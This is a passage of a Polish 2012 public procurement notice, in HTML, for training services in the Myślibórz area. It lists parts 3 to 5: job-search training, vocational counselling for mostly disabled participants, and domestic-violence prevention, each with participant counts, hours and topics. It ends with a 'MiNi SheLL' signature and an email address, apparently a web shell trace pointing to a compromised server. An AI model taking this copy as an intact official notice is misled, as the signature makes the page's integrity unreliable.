Czas trwania szkolenia: 15 godzin, jedna godzina równa się 60 minutom;
Szkolenie będzie odbywać się w grupie 15 osobowej 
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
- trening twórczego myślenia: kształtowanie otwartości na nowe doświadczenia, kształtowanie pomysłowości i giętkości mówienia, kształtowanie wrażliwości intelektualnej, kształtowanie samodzielności w planowaniu i wykonywaniu pracy
- komunikacja interpersonalna: jak mówić i być słuchanym, komunikacja werbalne i niewerbalna, techniki mówienia, przeszkody w sprawnej komunikacji
- skuteczne poszukiwanie pracy: analiza umiejętności zawodowych, źródła informacji i techniki poszukiwania pracy, sztuka autoprezentacji zawodowej, zasady prowadzenia rozmowy kwalifikacyjnej, przygotowanie dokumentów
- radzenie sobie w trudnych sytuacjach: uwarunkowania osobowościowe a podatność na stres, przyczyny i źródła stresu, podstawowe techniki relaksacyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Doradztwo zawodowe dla uczestników z PCPR Myślibórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie z zakresu: Doradztwo zawodowe dla uczestników z PCPR Myślibórz

Ilość osób, które zostaną skierowane na kurs: 49 osób, w tym 35 osób niepełnosprawnych w tym : 8 osób z niesprawnością psychiczną w stopniu lekkim, znacznym i umiarkowanym oraz 7 osób z niesprawnością fizyczną

Miejsce zamieszkania uczestników:
Mostkowo - 2 osoby 
Myślibórz - 14 osób 
Barlinek - 10 osób (+ 1 opiekun) 
Czerników - 1 osoba
Chłopowo - 2 osoby
Golenice- 1 osoba (+ 1 opiekun) 
Dębno- 12 osób (+ 2 opiekunów)
Krześnica - 1 osoba 
Wierzbówek- 1 osoba 
Oborzany- 1 osoba (+ 1 opiekun) 
Chwarszczany- 1 osoba (+ 1 opiekun) 
Dąbrowa - 1 osoba
Sitno - 1 osoba
Golczew - 1 osoba

Czas trwania szkolenia: 49 godzin, jedna godzina równa się 60 minutom, 
Zajęcia mają się odbyć indywidualnie dla każdego uczestnika 
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
- analiza potrzeb, 
- oczekiwania i doświadczenia zawodowe uczestników projektu, 
- moje mocne i słabe strony, 
- test preferencji i predyspozycji zawodowych, 
- rynek pracy,
- samoocena i autoanaliza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeciwdziałanie przemocy w rodzinie dla uczestników z OPS Myślibórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenia z zakresu: Przeciwdziałanie przemocy w rodzinie dla uczestników z OPS Myślibórz

Ilość osób, które zostaną skierowane na kurs: 28 osób, zamieszkujących niżej wymienione miejscowości:
Sulimierz - 1 osoba
Sarbinowo - 1 osoba
Rościn - 1 osoba
Kierzków - 1 osoba
Czerników - 1 osoba
Myśliborzyce - 1 osoba
Głazów - 1 osoba
Tarnowo - 1 osoba
Golenice- 1 osoba
Pniów - 1 osoba
Ławy - 1 osoba
Myślibórz - 17 osób

Czas trwania szkolenia: 10 godzin, jedna godzina równa się 60 minutom, 
Zakres tematyczny szkolenia powinien, co najmniej obejmować:
1. charakterystyka i rodzaje przemocy w rodzinie,
2. ustawa o przeciwdziałaniu przemocy w rodzinie,
3. przemoc gorąca i przemoc chłodna,
4. fazy cyklu przemocy,
5. strategie powstrzymywania przemocy,
6. zespół zaburzeń stresu pourazowego,
7. prawno - karna ochrona dziecka,
8. instytucja zatrzymania w polskim prawie karnym oraz związane z tym procedury,
9. fundusz alimentacyjny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com